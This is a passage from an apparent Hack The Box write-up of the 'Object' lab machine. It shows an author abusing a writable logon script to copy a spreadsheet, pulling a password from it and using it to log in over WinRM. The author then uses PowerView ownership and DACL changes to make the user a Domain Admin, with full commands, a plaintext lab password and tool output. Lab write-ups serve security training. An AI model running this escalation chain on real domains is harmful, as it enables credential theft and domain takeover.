-a----        12/3/2024   6:52 PM           7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a----        12/3/2024   7:06 PM            830 output
-a----        12/3/2024   7:00 PM         904779 PowerView.ps1
-a----        12/3/2024   7:06 PM            104 run.ps1
-a----        12/3/2024   6:49 PM         578048 SharpHound.exe
-a----        12/3/2024   6:51 PM        1308348 SharpHound.ps1

c:\users\maria\desktop contained Engines.xls:

*Evil-WinRM* PS C:\programdata> cat output


    Directory: C:\users\maria\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/26/2021   8:13 AM           6144 Engines.xls

I edited run.ps1 to copy Engines.xls into c:\programdata:

*Evil-WinRM* PS C:\programdata> echo 'copy c:\users\maria\desktop\Engines.xls c:\programdata' > run.ps1
*Evil-WinRM* PS C:\programdata> ls


    Directory: C:\programdata


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-       10/21/2021   3:13 AM                Microsoft
d-----       10/21/2021  12:05 AM                regid.1991-06.com.microsoft
d-----        9/15/2018  12:19 AM                SoftwareDistribution
d-----        4/10/2020   5:48 AM                ssh
d-----        4/10/2020  10:49 AM                USOPrivate
d-----        4/10/2020  10:49 AM                USOShared
d-----        8/25/2021   2:57 AM                VMware
-a----        12/3/2024   6:52 PM          11443 20241203185242_BloodHound.zip
-a----       10/26/2021   8:13 AM           6144 Engines.xls
-a----        12/3/2024   6:52 PM           7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a----        12/3/2024   7:09 PM            830 output
-a----        12/3/2024   7:00 PM         904779 PowerView.ps1
-a----        12/3/2024   7:09 PM            114 run.ps1
-a----        12/3/2024   6:49 PM         578048 SharpHound.exe
-a----        12/3/2024   6:51 PM        1308348 SharpHound.ps1

I downloaded Engines.xls:

*Evil-WinRM* PS C:\programdata> download Engines.xls
                                        
Info: Downloading C:\programdata\Engines.xls to Engines.xls
                                        
Info: Download successful!

Engines.xls contained three passwords:

Engines.xls

I used netexec to check each password against WinRM, and W3llcr4ft3d_4cls was valid:

┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ netexec winrm 10.10.11.132 -u 'maria' -p 'W3llcr4ft3d_4cls' 
WINRM       10.10.11.132    5985   JENKINS          [*] Windows 10 / Server 2019 Build 17763 (name:JENKINS) (domain:object.local)
WINRM       10.10.11.132    5985   JENKINS          [+] object.local\maria:W3llcr4ft3d_4cls (Pwn3d!)

evil-winrm shell as maria:

┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ evil-winrm -i 10.10.11.132 -u 'maria' -p 'W3llcr4ft3d_4cls'
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents> whoami
object\maria

As discovered earlier in BloodHound, maria had WriteOwner permissions on Domain Admins. WriteOwner alone does not allow adding members, but the owner of an object can always modify its DACL, so I used PowerView to change the owner of Domain Admins to maria, then grant the user full rights over the group through the now-writable DACL, and then add the user as a member:

*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'
*Evil-WinRM* PS C:\programdata> Add-DomainObjectAcl -TargetIdentity 'Domain Admins' -PrincipalIdentity 'maria' -Rights All
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'

I confirmed maria was successfully added to the Domain Admins group:

*Evil-WinRM* PS C:\programdata> net user maria
User name                    maria
Full Name                    maria garcia
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/21/2021 8:16:32 PM
Password expires             Never
Password changeable          10/22/2021 8:16:32 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 c:\programdata\run.ps1
User profile
Home directory
Last logon                   12/3/2024 7:14:20 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Admins        *Domain Users
The command completed successfully.

The group SIDs in an access token are fixed when the token is built at logon, so the existing WinRM session did not yet carry the Domain Admins membership. After exiting and logging in again, I was able to access the administrator user's directory:

┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ evil-winrm -i 10.10.11.132 -u 'maria' -p 'W3llcr4ft3d_4cls'
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents> cd \users\administrator\desktop
*Evil-WinRM* PS C:\users\administrator\desktop> ls


    Directory: C:\users\administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/3/2024   5:23 PM             34 root.txt

Written by Mike Garrity